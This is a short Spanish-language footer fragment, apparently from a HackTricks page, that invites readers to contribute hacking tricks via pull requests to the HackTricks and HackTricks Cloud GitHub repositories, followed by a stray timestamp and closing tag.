* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2023-06-05 20:33:24 +02:00
< / details >